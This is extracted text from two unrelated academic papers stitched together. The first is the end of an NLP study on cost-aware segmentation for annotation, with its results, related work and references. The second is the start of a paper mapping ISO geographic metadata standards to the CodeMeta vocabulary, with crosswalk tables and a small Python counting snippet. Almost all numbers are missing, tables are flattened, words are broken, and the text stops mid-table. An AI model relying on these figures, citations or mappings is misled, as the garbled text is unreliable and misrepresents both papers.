summarizes the results of our experiment. it shows that the annotations by each participant resulted in a better classifier for the proposed method than for the baseline, but also took up considerably more time, a less clear improvement than for the transcription task.

table : word segmentation task results, for our expert and non-expert participants. for each participant, the resulting classifier accuracy [%] after supervision is shown for the baseline and the proposed method, along with the time [min] they needed. the unsupervised accuracy was . %.

in fact, the total error for time predictions was as high as . % on average, where the baseline method tended to take less time than predicted, and the proposed method more time. this is in contrast to a much lower total error (within %) when cross-validating our user model training data. this is likely due to the fact that the data for training the user model was selected in a balanced manner, as opposed to selecting difficult examples, as our method is prone to do. thus, we may expect much better predictions when selecting user model training data that is more similar to the test case. plotting classifier accuracy over annotation time draws a clearer picture. let us first analyze the results for the expert annotator. figure (e
) shows that the proposed method resulted in consistently better results, indicating that time predictions were still effective. note that this comparison may put the proposed method at a slight disadvantage by comparing intermediate results despite optimizing globally. for the non-experts, the improvement over the baseline is less consistent, as can be seen in figure (n. ) for one representative. according to our analysis, this can be explained by two factors: ( ) the non-experts' annotation error ( . % on average) was much higher than the expert's ( . %), resulting in a somewhat irregular classifier learning curve. ( ) the variance in annotation time per segment was consistently higher for the non-experts than for the expert, indicated by an average per-segment prediction error of % vs. % relative to the mean actual value, respectively. informally speaking, non-experts made more mistakes, and were more strongly influenced by the difficulty of a particular segment (which was higher on average with the proposed method, as indicated by a lower average confidence).

figure : classifier improvement over time (classifier accuracy plotted against annotation time [min.]), depicted for the expert (e) and a non-expert (n), with curves for the proposed method and the baseline. the graphs show numbers based on ( ) actual annotations and user models as in sections . and . , ( ) error-free annotations, ( ) measured times replaced by predicted times, and ( ) both reference annotations and replaced time predictions.

in figures ( - ) we present a simulation experiment in which we first pretend as if annotators made no mistakes, then as if they needed exactly as much time as predicted for each segment, and then both. this cheating experiment works in favor of the proposed method, especially for the non-expert. we may conclude that our segmentation approach is effective for the word segmentation task, but requires more accurate time predictions. better user models will certainly help, although for the presented scenario our method may be most useful for an expert annotator. note that the non-expert in the figure annotated much faster than the expert, which explains the comparable classification result despite making more annotation errors; this is in contrast to the other non-experts, who were slower. . computational efficiency since our segmentation algorithm does not guarantee polynomial runtime, computational efficiency was a concern, but did not turn out problematic. on a consumer laptop, the solver produced segmentations within a few seconds for a single document containing several thousand tokens, and within hours for corpora consisting of several dozen documents. runtime increased roughly quadratically with respect to the number of segmented tokens. we feel that this is acceptable, considering that the time needed for human supervision will likely dominate the computation time, and reasonable approximations can be made as noted in section . . relation to prior work efficient supervision strategies have been studied across a variety of nlp-related research areas, and have received increasing attention in recent years. examples include post editing for speech recognition (sanchez-cortina et al., ), interactive machine translation (gonzález-rubio et al., ), active learning for machine translation (haffari et al., ; gonzález-rubio et al., ) and many other nlp tasks (olsson, ), to name but a few studies.
it has also been recognized by the active learn- ing community that correcting the most useful parts first is often not optimal in terms of efficiency, since these parts tend to be the most difficult to manually annotate (settles et al., ). the authors advocate the use of a user model to predict the supervision ef- fort, and select the instances with best “bang-for-the- buck.” this prediction of supervision effort was suc- cessful, and was further refined in other nlp-related studies (tomanek et al., ; specia, ; cohn and specia, ). our approach to user modeling using gp regression is inspired by the latter. most studies on user models consider only super- vision effort, while neglecting the accuracy of hu- man annotations. the view on humans as a perfect oracle has been criticized (donmez and carbonell, ), since human errors are common and can negatively affect supervision utility. research on human-computer-interaction has identified the mod- eling of human errors as very difficult (olson and olson, ), depending on factors such as user ex- perience, cognitive load, user interface design, and fatigue. nevertheless, even the simple error model used in our post editing task was effective. the active learning community has addressed the problem of balancing utility and cost in some more detail. the previously reported “bang-for-the-buck” approach is a very simple, greedy approach to com- bine both into one measure. a more theoretically founded scalar optimization objective is the net ben- efit (utility minus costs) as proposed by vijaya- narasimhan and grauman ( ), but unfortunately is restricted to applications where both can be ex- pressed in terms of the same monetary unit. vijaya- narasimhan et al. ( ) and donmez and carbonell ( ) use a more practical approach that specifies a constrained optimization problem by allowing only a limited time budget for supervision. our approach is a generalization thereof and allows either specify- ing an upper bound on the predicted cost, or a lower bound on the predicted utility. the main novelty of our presented approach is the explicit modeling and selection of segments of various sizes, such that annotation efficiency is opti- mized according to the specified constraints. while some works (sassano and kurohashi, ; neubig et al., ) have proposed using subsentential seg- ments, we are not aware of any previous work that explicitly optimizes that segmentation. conclusion we presented a method that can effectively choose a segmentation of a language corpus that optimizes supervision efficiency, considering not only the ac- tual usefulness of each segment, but also the anno- tation cost. we reported noticeable improvements over strong baselines in two user studies. future user experiments with more participants would be desir- able to verify our observations, and allow further analysis of different factors such as annotator ex- pertise. also, future research may improve the user modeling, which will be beneficial for our method. acknowledgments the research leading to these results has received funding from the european union seventh frame- work programme (fp / - ) under grant agreement n bridges across the language divide (eu-bridge). references yuya akita, masato mimura, and tatsuya kawahara. . automatic transcription system for meetings of the japanese national congress. in interspeech, pages – , brighton, uk. trevor cohn and lucia specia. . 
modelling anno- tator bias with multi-task gaussian processes: an ap- plication to machine translation quality estimation. in association for computational linguistics confer- ence (acl), sofia, bulgaria. pinar donmez and jaime carbonell. . proactive learning : cost-sensitive active learning with mul- tiple imperfect oracles. in conference on information and knowledge management (cikm), pages – , napa valley, ca, usa. jesús gonzález-rubio, daniel ortiz-martı́nez, and fran- cisco casacuberta. . balancing user effort and translation error in interactive machine translation via confidence measures. in association for compu- tational linguistics conference (acl), short papers track, pages – , uppsala, sweden. jesús gonzález-rubio, daniel ortiz-martı́nez, and fran- cisco casacuberta. . an active learning scenario for interactive machine translation. in international conference on multimodal interfaces (icmi), pages – , alicante, spain. gurobi optimization. . gurobi optimizer refer- ence manual. gholamreza haffari, maxim roy, and anoop sarkar. . active learning for statistical phrase-based machine translation. in north american chapter of the association for computational linguistics - human language technologies conference (naacl- hlt), pages – , boulder, co, usa. stefan irnich and guy desaulniers. . shortest path problems with resource constraints. in column gen- eration, pages – . springer us. kikuo maekawa. . balanced corpus of contem- porary written japanese. in international joint con- ference on natural language processing (ijcnlp), pages – , hyderabad, india. r. timothy marler and jasbir s. arora. . survey of multi-objective optimization methods for engineer- ing. structural and multidisciplinary optimization, ( ): – , april. evgeny matusov, arne mauser, and hermann ney. . automatic sentence segmentation and punctuation prediction for spoken language translation. in inter- national workshop on spoken language translation (iwslt), pages – , kyoto, japan. hiroaki nanjo, yuya akita, and tatsuya kawahara. . computer assisted speech transcription sys- tem for efficient speech archive. in western pacific acoustics conference (wespac), seoul, korea. graham neubig, yosuke nakata, and shinsuke mori. . pointwise prediction for robust , adapt- able japanese morphological analysis. in associa- tion for computational linguistics: human language technologies conference (acl-hlt), pages – , portland, or, usa. atsunori ogawa, takaaki hori, and atsushi naka- mura. . discriminative recognition rate esti- mation for n-best list and its application to n-best rescoring. in international conference on acoustics, speech, and signal processing (icassp), pages – , vancouver, canada. judith reitman olson and gary olson. . the growth of cognitive modeling in human-computer interaction since goms. human-computer interac- tion, ( ): – , june. fredrik olsson. . a literature survey of active ma- chine learning in the context of natural language pro- cessing. technical report, sics sweden. david pisinger. . a minimal algorithm for the multiple-choice knapsack problem. european jour- nal of operational research, ( ): – . john c. platt. . probabilistic outputs for sup- port vector machines and comparisons to regularized likelihood methods. in advances in large margin classifiers, pages – . mit press. carl e. rasmussen and christopher k.i. williams. . gaussian processes for machine learning. mit press, cambridge, ma, usa. isaias sanchez-cortina, nicolas serrano, alberto san- chis, and alfons juan. . 
a prototype for inter- active speech transcription balancing error and su- pervision effort. in international conference on intel- ligent user interfaces (iui), pages – , lisbon, portugal. manabu sassano and sadao kurohashi. . using smaller constituents rather than sentences in ac- tive learning for japanese dependency parsing. in association for computational linguistics conference (acl), pages – , uppsala, sweden. burr settles, mark craven, and lewis friedland. . active learning with real annotation costs. in neural information processing systems conference (nips) - workshop on cost-sensitive learning, lake tahoe, nv, united states. burr settles. . an analysis of active learning strategies for sequence labeling tasks. in confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – , honolulu, usa. hagen soltau, florian metze, christian fügen, and alex waibel. . a one-pass decoder based on poly- morphic linguistic context assignment. in auto- matic speech recognition and understanding work- shop (asru), pages – , madonna di campiglio, italy. lucia specia. . exploiting objective annota- tions for measuring translation post-editing effort. in conference of the european association for machine translation (eamt), pages – , nice, france. matthias sperber, graham neubig, christian fügen, satoshi nakamura, and alex waibel. . efficient speech transcription through respeaking. in inter- speech, pages – , lyon, france. bernhard suhm, brad myers, and alex waibel. . multimodal error correction for speech user inter- faces. transactions on computer-human interaction, ( ): – . evimaria terzi and panayiotis tsaparas. . efficient algorithms for sequence segmentation. in siam con- ference on data mining (sdm), bethesda, md, usa. katrin tomanek and udo hahn. . semi-supervised active learning for sequence labeling. in interna- tional joint conference on natural language process- ing (ijcnlp), pages – , singapore. katrin tomanek, udo hahn, and steffen lohmann. . a cognitive cost model of annotations based on eye-tracking data. in association for compu- tational linguistics conference (acl), pages – , uppsala, sweden. paolo toth and daniele vigo. . the vehicle routing problem. society for industrial & applied mathemat- ics (siam), philadelphia. sudheendra vijayanarasimhan and kristen grauman. . whats it going to cost you?: predicting ef- fort vs. informativeness for multi-label image anno- tations. in conference on computer vision and pat- tern recognition (cvpr), pages – , miami beach, fl, usa. sudheendra vijayanarasimhan, prateek jain, and kristen grauman. . far-sighted active learning on a bud- get for image and video recognition. in conference on computer vision and pattern recognition (cvpr), pages – , san francisco, ca, usa, june. submitted august accepted january published february corresponding author ted habermann, ted.habermann@gmail.com academic editor silvio peroni additional information and declarations can be found on page doi . /peerj-cs. copyright habermann distributed under creative commons cc-by . open access mapping iso - geographic metadata standards to codemeta ted habermann the hdf group, champaign, il, united states of america abstract the codemeta project recently proposed a vocabulary for software metadata. iso technical committee has published a set of metadata standards for geographic data and many kinds of related resources, including software. 
in order for iso metadata creators and users to take advantage of the codemeta recommendations, a mapping from iso elements to the codemeta vocabulary must exist. this mapping is complicated by differences in the approaches used by iso and codemeta, primarily a difference between hard and soft typing of metadata elements. these differences are described in detail and a mapping is proposed that includes sixty-four of the sixty-eight codemeta v terms. the codemeta terms have also been mapped to dialects used by twenty-one software repositories, registries and archives. the average number of terms mapped in these cases is . . the disparity between these numbers reflects the fact that many of the dialects that have been mapped to codemeta are focused on citation or dependency identification and management while iso and codemeta share additional targets that include access, use, and understanding. addressing this broader set of use cases requires more metadata elements. subjects digital libraries, software engineering keywords software citation, codemeta, iso metadata, metadata, crosswalk introduction the codemeta project (codemeta project, ) recently proposed ( ) a vocabulary for documenting software, ( ) mappings between metadata fields used by a broad range of software repositories, registries and archives (codemeta crosswalk, ), and ( ) developed software with the purpose of facilitating automatic translation between different representations of software metadata. the vocabulary was designed to support several different software use cases, including citation, discovery, use and, to some degree, understanding. the iso technical committee has developed generic metadata standards that are widely used for geographic data of many kinds. these standards were also designed as a foundation that can be built on to document many kinds of things and support many use cases (habermann, a; habermann, b; habermann, c). this paper describes a mapping between the conceptual model that underlies iso metadata (iso - , ) and codemeta with the goal of facilitating the creation of codemeta-compliant descriptions of software that is documented using the iso standards. the communities that developed these two metadata dialects share the important goal of comprehensive standards that address multiple use cases for many disciplines. both groups pursue this goal by developing consensus, but the details of the processes used to develop their standards differ. iso tc represents a traditional international standards body with well-defined processes, publication methods and a business model that includes costs to users for standards documents. codemeta represents a community of volunteer practitioners with an initial set of proposed conventions open on the web and an invitation for adoption, experimentation and evolution. in addition to these process differences, there are also differences between the structures and implementations of these two models. these are described below with the mappings following.
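as a small illustration of the dialect-coverage counts discussed in the next section, the sketch below tallies non-empty cells per dialect column in the crosswalk; it assumes a local csv export named crosswalk.csv with one column per dialect, which may differ from the repository's current layout.

```python
# count, for each dialect column, how many codemeta terms have a non-empty equivalent.
# "crosswalk.csv" is an assumed local export of the codemeta crosswalk file.
import csv

with open("crosswalk.csv", newline="", encoding="utf-8") as handle:
    rows = list(csv.DictReader(handle))

coverage = {
    column: sum(1 for row in rows if (row[column] or "").strip())
    for column in rows[0].keys()
}

for dialect, count in sorted(coverage.items(), key=lambda item: item[1], reverse=True):
    print(f"{dialect}: {count} codemeta concepts covered")
```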
dialect coverage and scope mapping metadata for software between different schemas and dialects is an important technical goal of codemeta. this goal is supported using a crosswalk file that is maintained and contributed to in the codemeta git repository (codemeta crosswalk, ). this file lists the codemeta terms along with equivalents in twenty-one dialects. this crosswalk is the basis for translating content between these dialects. a similar situation occurs in many in science communities that are trying to support multiple use cases, i.e., document, share, and trust, for datasets using multiple metadata dialects (see gordon & habermann, ). the concept of ‘‘dialect coverage’’ has come up in those studies as the amount (%) of the concepts in a particular recommendation that a dialect includes. in the codemeta case, this is the number of codemeta concepts that can be represented in the dialects listed in the crosswalk file (crosswalk data, ). figure shows this count for each of the twenty-one dialects. these counts were determined from the crosswalk file by counting the number of cells with content in each column using a spreadsheet count() function. both versions of codemeta and iso - ( ) are included in this figure as well. the data show that the iso dialect covers very close to all ( / ) of the codemeta concepts and the other twenty-one dialects cover an average of . / , suggesting that codemeta is more similar to iso than it is to other dialects that have done crosswalks. the difference between the iso mapping and others is striking. it likely reflects the difference between the small number of metadata elements used for discovering and citing software (or data) and the larger number needed to be able to use it and trust it. in the current software citation landscape, this is the difference between the complete codemeta vocabulary, i.e., all metadata for code (over sixty items), and the force software citation guidelines, i.e., metadata for code citation (smith, katz & niemeyer, ) which includes only ten items. in some cases, multiple codemeta terms are mapped to the same iso elements. most of this ambiguity is related to differences in the two models and approaches that are discussed in detail below. iso elements that are mapped to more than one codemeta term are identified with * in the crosswalk tables below. model characteristics the iso metadata standards are based on a uml model that is harmonized across all standards developed and managed by the committee. the model is built around classes habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure coverage of codemeta concepts in multiple dialects. the average number of codemeta con- cepts covered by twenty-one dialects is . . the iso dialect covers sixty-four of sixty-eight codemeta concepts. full-size doi: . /peerjcs. /fig- and attributes that describe the structure of the standards and the relationships among objects. iso - ( ) includes thirteen top-level classes that provide details on identification, content, constraints, distribution, quality, usage, reference systems, spatial representation and several other areas. the iso standard includes a scope element at the root of each record that gives the type of resource described by the metadata. 
the default scope is dataset, but other options include: aggregate, application, attribute, attributetype, collection, collectionhardware, collectionsession, coverage, dimensiongroup, document, feature, featuretype, fieldsession, initiative, metadata, model, nongeographicdataset, otheraggregate, platformseries, product, productionseries, propertytype, repository, sample, sensor, sensorseries, series, service, software, tile, transferaggregate (see habermann, a; habermann, b; habermann, c). mapping the codemeta vocabulary to the iso standard is an initial step toward defining the content that could be included in iso metadata records that describe software and applications, i.e., those where the scope is software. the most commonly used representation of the iso standards is xml (iso - , ). iso xpaths uniquely identify metadata content and follow the structure of the uml model, with levels in the xml alternating between objects (with types) and properties. this results in xml that is ‘‘striped’’ like the xml representation of the resource description framework (rdf, ) (w c, ), i.e., role/type/role/type/content. types generally start with two uppercase letters (md, ci, ...) that indicate the uml package that they are habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. defined in (metadata, citation, ...) followed by an underscore (md_, ci_, ...). properties (termed roles in this discussion) are in lower camel case. a significant benefit of the striped xml is that properties can be defined with abstract objects that can share properties while being instantiated with different types. for example, the iso ci_party object is abstract and includes name and contactinfo properties. it is extended and specialized by ci_individual and ci_ organisation objects which inherit name and contactinfo properties and add properties that are relevant for people and organizations, e.g., organizations can include individuals, logos, and position names. this approach also facilitates reuse by allowing standard objects (e.g., people, organizations, or citations) to be referenced using links rather than repetitive content (https://geo-ide.noaa.gov/wiki/index.php?title=iso_components). another benefit of this approach in iso is the same as that in the schema.org case— communities can extend object definitions when necessary and, in the iso case, the resulting extended objects fit naturally into the iso xml representation. this approach is similar to the schema extension model used in codemeta to add properties deemed important by the codemeta community to the more general softwaresourcecode schema that is also a specialization of the schema.creativework schema. the namespace for each element in the xml is identified using a standard namespace prefix (mdb, cit, ...). asterisks are used in the xpaths to indicate locations where several objects can be used. for example, mdb:identificationinfo/*/ indicates that either mdb:md_ dataidentification or srv:sv_serviceidentification objects can occur in that location. a simplified notation is introduced for paths through the uml conceptual model in this document that includes only the role names and no information that is specific to the xml representation. 
for example, the xpath /mdb:md_metadata/mdb:identificationinfo/ mri:md_dataidentification/mri:resourcespecificusage/mri:md_usage/mri:identifiedissues/ cit:ci_ citation/cit:onlineresource/cit:ci_onlineresource/cit:linkage is replaced by the conceptpath:identificationinfo.resourcespecificusage.identifiedissues.onlineresource.linkage. these simplified ‘‘concept paths’’ improve readability and emphasize equivalences between codemeta and iso in the conceptual space. specific xpaths can be constructed from these concept paths when necessary to implement translation of existing iso content to codemeta representations. the reverse translation is not unique. codemeta specifies a vocabulary rather than a structural model. it includes properties from several schema.org schemas listed in table along with the number of items from each schema (crosswalk data, ). these schemas exist in a schema.org hierarchy which is similar in many ways to the iso structure. softwareapplication and softwaresourcecode schemas are both specializations of the thing >creativework schema. codemeta extends these schemas (in codemeta.softwaresourcecode) with several properties that lack clear equivalents in schema.org. hard types and soft types all standards and vocabularies need to make choices between hard or soft typing of objects they are describing. hard typing requires specific names for items and is the only choice available in implementations where names alone can be used to distinguish habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://geo-ide.noaa.gov/wiki/index.php?title=iso_components http://dx.doi.org/ . /peerj-cs. table schema.org schemas and item counts for codemeta vocabulary. source #terms source #terms schema:creativework schema:thing schema:softwareapplication schema:softwaresourcecode codemeta:softwaresourcecode schema (not mapped) schema:person between items, e.g., codemeta. for example, if publication and revision dates are required for complete descriptions of a resource, hard typed representations would include two items: e.g., publicationdate and revisiondate. soft typing can be used in dialects which support item attributes as well as values, e.g., xml. in that case, these two dates would be represented with the same name (xml element) and distinguished by a type attribute: <datetype=’’publication’’>and <datetype=’’revision’’>. the difference between these two approaches emerges as the dialects evolve. hard types evolve by adding new elements to the underlying model, e.g., adding creationdate (or some other type of date) when it becomes apparent that it is needed, and unambiguous definitions of those elements. soft types evolve by adding items to the shared vocabulary of date types, typically a codelist or thesaurus. the critical difference between hard and soft types boils down to differences in governance models and change tolerance. in communities that use hard types, members must be tolerant to changes in the models and, typically, changes in tooling built on them. communities that use soft typing must have mechanisms for sharing and evolving vocabularies, typically control bodies or rules. the iso model is soft-typed and the codemeta model is hard-typed. table lists some of the documentation concepts that illustrate the contrast between these approaches. the first row shows the differences in how dates are treated. the codemeta vocabulary includes four types of dates listed in the second column of table . 
if other date types are required to describe software, maybe datedeprecated for example, new terms would be found in schema.org or added to the vocabulary to address those needs. the iso approach involves a single date concept and a codelist that includes sixteen options, shown in the third column of table . that codelist is designed to be extended by communities with other needs without impacting the structure of the standard. in this example, the date type codelist already includes the term ‘‘deprecated’’. citations connecting users to resources is one of the most important roles of metadata. it is also one of the most ubiquitous. several classes of citations are important. citation to the resource being described in the metadata (resource citation). the role of these citations is to provide guidance on how the resource being described should be cited and there is only one of these in each metadata record. citations to related resources (related resource citation). these are generic references to some other resource and generally include information about the relationship between the resource being described and the related resource. see, for example, the relatedidentifier element in the datacite metadata schema (datacite habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table codemeta hard types and related iso codelists. item codemeta items iso - codelist valuesa dates embargodate datecreated datemodified datepublished ci_datetypecode: creation publication revision expiry lastupdate lastrevision nextupdate unavailable inforce adopted deprecated superseded validitybegins validityexpires released distribution people and organizations author contributor creator copyrightholder editor funder producer provider publisher sponsor affiliation ci_rolecode: resourceprovider custodian owner user distributor originator pointofcontact principalinvestigator processor publisher author sponsor coauthor collaborator editor mediator rightsholder contributor funder stakeholder maintainer online resource types buildinstructions contintegration issuetracker readme id identifier downloadurl installurl coderepository relatedlink sameas url ci_onlinefunctioncode: download information offlineaccess order search completemetadata browsegraphic upload emailservice browsing fileaccess associations supportingdata ds_associationtypecode: crossreference largerworkcitation partofseamlessdatabase stereomate iscomposedof collectivetitle series dependency revisionof keyword keywords programminglanguage applicationcategory applicationsubcategory md_keywordtypecode: discipline place stratum temporal theme datacentre featuretype instrument platform process project service product subtopiccategory taxon notes. aiso - codelists from https://standards.iso.org/iso/ /resources/codelists/cat/codelists.html . metadata working group, ) which includes relatedidentifiertype and relationtype attributes as additional information. citations to other, typically specific, resources (specific resource citations). for example, the iso object that describes data processing includes a citation in the role of softwarereference that specifically provides a reference to software used in the processing. other examples of these citation types are included in the following discussion. 
iso citations iso - includes all three types of citations: • the resource citation is unique and occurs at a specific location in the conceptual model: identificationinfo.citation (xpath = /mdb:md_metadata/mdb:identification info/*/mri:citation/cit:ci_citation). • related resource citations also occur at a specific location in the model, identifica- tioninfo.associatedresource (xpath = /mdb:md_metadata/mdb:identificationinfo/*/ mri:associatedresource/mri:md_associatedresource/mri:name/cit:ci_citation along with two codelists (associationtype and initiativetype) that provide information about how the resource is associated.). • specific resource citations occur in a number of locations in the iso model as part of specific classes. for example, citations to additional documentation occur at identificationinfo.additionaldocumentation and citations to quality reports occur at dataqualityinfo.standalonequalityreport. all iso citations include elements of traditional citations to books or papers e.g., title, authors (people or organizations in many roles), dates (many types), series information, habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://standards.iso.org/iso/ /resources/codelists/cat/codelists.html http://dx.doi.org/ . /peerj-cs. table relative xpaths to titles, identifiers, and urls in iso citations. item xpath from ci_citation title cit:ci_citation/cit:title/gco:characterstring (concept= title) identifier cit:ci_citation/cit:identifier/mcc:md_identifier/mcc:code/gco:characterstring (concept = identifier.code) url cit:ci_citation/cit:onlineresource/cit:ci_onlineresource/cit:linkage/gco:characterstring (concept=onlineresource.linkage) page numbers, etc., as well as identifiers (issn, isbn, and other types) and urls with titles, descriptions and types. the xpaths to these items from each iso citation root are shown in table . codemeta citations codemeta includes twenty-six terms that represent resources that are related to or support the use of the software being described. these terms have several different types (text, url, text or url, creativework, creativework or url, computer language or text, ...). in the mappings below, these terms are mapped to the iso citations. the specific types can be described by adding the paths in table to the concept or xpaths. distribution many of the distribution systems for geographic data described by iso metadata include repositories (generally called archives or data centers) that manage and preserve data while providing on-going support for users. iso metadata standards accommodate approaches to resource distribution with or without descriptions of repositories (termed distributors) and each repository can provide several urls (transferoptions) for each resource. these onlineresources can have any of the functions included in the ci_onlinefunctioncode codelist in table . the most common online functions are download and information and these are used in the mappings to indicate direct access to the resource (function =download) or information about the resource (function =information). additional documentation the codemeta vocabulary includes many items that are intended to help users use and understand the software described in the metadata. in the iso standards, these items can be described in two ways: as associated resources (identificationinfo.associatedresource) or as additional documentation (identificationinfo.additionaldocumentation). i have chosen the later in these cases. 
in dialects without specific citations, e.g., datacite, these would be referred to as relatedidentifiers with appropriate relationtypes as the datacite dialect is soft typed (datacite metadata working group, ). one important goal of codemeta is to enable authors to cite software that is used to store, process, analyze, and visualize the data and model results that they use in their work. increasing citations from the scientific literature is large part of this goal, but there are also significant opportunities to improve the completeness of dataset metadata by citing software. this is generally done as part of the provenance or lineage section of the metadata. the iso standards provide several specific resource citations for citing software, including: habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • resourcelineage.processstep.processinginformation.algorithm.citation, • resourcelineage.processstep.processinginformation.softwarereference, and • resourcelineage.processstep.processinginformation.documentation. mappings the mappings between codemeta and iso are presented here in a series of tables that correspond to the source schema.org schemas used in order to provide some structure that may help clarify the relationships and improve understanding. the process of creating the mappings involved three steps: ( ) obvious connections, i.e., description ->identificationinfo.abstract, or name ->identificationinfo.citation.title, ( ) more complicated connections like those discussed above, and ( ) matching intended types as closely as possible, i.e., codemeta terms that were intended to be identifiers were mapped to iso identifier codes (identifier ->identificationinfo.citation.identifier.code) and those that were intended to be urls were mapped to iso linkages (downloadurl ->distributioninfo.transferoptions.online[function =’download’].linkage). this process is, of course, more subjective than objective, and the resulting mappings reflect experience authoring the iso standards and working with them in multiple contexts over the last decade. the mappings include the property names, types, and descriptions from the codemeta vocabulary, conceptual paths for the iso items (iso - , ), and xpaths from the standard xml representation (iso - , ). the conceptual paths are provided here in lieu of the iso definitions for simplicity. the complete iso conceptual model with definitions is available in an html view (iso conceptual model, ). in some cases, multiple codemeta terms are mapped to single iso elements, as described in the additional documentation section above. these cases are marked with * in the tables. these mappings are also available in machine-readable forms (habermann, b; habermann, c). schema:person the schema.person schema provides a vocabulary for properties of people. in the iso standards, people and organizations are both referred to as parties and names can be given as any combination of individual names, organization names, or positions. this mapping includes seven items listed in table . schema:thing the schema.thing schema provides a vocabulary for properties of the most generic type of item. in the context of codemeta, this item is the resource described by the metadata which is software. in iso - ( ), properties related to the identification of the resource being described are in the identificationinfo section and many of the properties are included in the citation to that resource. 
as described above, these properties (title, identifier, and link) are included in all citations in the iso model. this mapping includes six items listed in table . habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema.person schema to iso - and iso - . property type description iso - iso - address postaladdress or text physical address of the item. party.contactinfo.address. deliverypoint cit:party/cit:ci_organisation/ cit:contactinfo/cit:ci_contact/ cit:address/cit:ci_address/cit: deliverypoint/gco:characterstring affiliation text an organization that this person is affiliated with. for example, a school/university party.namea cit:party/cit:ci_organisation/ cit:name/gco:characterstring email text email address party.contactinfo.address. electronicmailaddress cit:party/cit:ci_organisation/ cit:contactinfo/cit:ci_contact/ cit:address/cit:ci_address/ cit:electronicmailaddress/ gco:characterstring familyname text family name. in the us the last name of an person. this can be used along with givenname in- stead of the name property. party.namea cit:party/cit:ci_individual/ cit:name/gco:characterstring givenname text given name. in the us the first name of a person. this can be used along with familyname in- stead of the name property party.namea cit:party/cit:ci_individual/ cit:name/gco:characterstring identifier url url identifer, ideally an orcid id for individuals, a fundref id for funders party.partyidentifier.code cit:party/cit:ci_organisation/ cit:partyidentifier/mcc: md_identifier/mcc:code/ gco:characterstring name text the name of an organization, or if separate given and family names cannot be resolved, for a person party.namea cit:party/cit:ci_organisation/ cit:name/gco:characterstring notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. schema:thing.creativework the thing.creativework schema provides a vocabulary for the most generic kind of creative work, including books, movies, photographs, software programs, etc. this mapping includes twenty-four items listed in table . schema:thing.creativework.softwaresourcecode the thing.creativework.softwaresourcecode schema provides a vocabulary for describing computer programming source code. this mapping includes four items listed in table . codemeta:softwaresourcecode thecodemeta:softwaresourcecodeschemaextendsthing.creativework.softwaresourcecode with terms created by the codemeta project. this mapping includes ten items listed in table . habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema.thing schema to iso - and iso - . property type description iso - iso - description text a description of the item. identificationinfo.abstract /mdb:md_metadata/mdb:identificationinfo/*/mri:abstract/gco:characterstring identifier propertyvalue or url the identifier property represents any kind of identifier for any kind of thing, such as isbns, gtin codes, uuids etc. schema.org provides dedicated properties for representing many of these, either as textual strings or as url (uri) links. see background notes for more details. 
identificationinfo.citation.identifier.code /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:identifier/ mcc:md_identifier/mcc:code name text the name of the item (software, organiza- tion) identificationinfo.citation.title /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:title/ gco:characterstring relatedlink url a link related to this object, e.g., related web pages identificationinfo.citation.onlineresource [function=’information’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource/mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’information’]/cit:linkage sameas url url of a reference web page that unam- biguously indicates the item’s identity. e.g. the url of the item’s wikipedia page, wikidata entry, or official website. identificationinfo.citation.onlineresource [function=’information’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource/mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’information’]/cit:linkage url url url of the item. identificationinfo.citation.onlineresource [function=’download’]a /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:onlineresource/cit:ci_onlineresource[gmd:function/ gmd:ci_onlinefunctioncode,’download’]/cit:linkage notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the thing.creativework schema to iso - and iso - . property type description iso - iso - aauthor organization or person the author of this content or rating. please note that author is special in that html provides a special mechanism for indicating authorship via the rel tag. that is equivalent to this and may be used in- terchangeably. identificationinfo.citation. citedresponsi- bleparty[role=’author’].party.name or identifi- cationinfo.citation. citedresponsibleparty[role =’originator’].party.name /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’author’] or /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’originator’] citation creativework or url a citation or reference to another creative work, such as another publication, web page, scholarly article, etc. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation contributor organization or person a secondary contributor to the creative- work or event. 
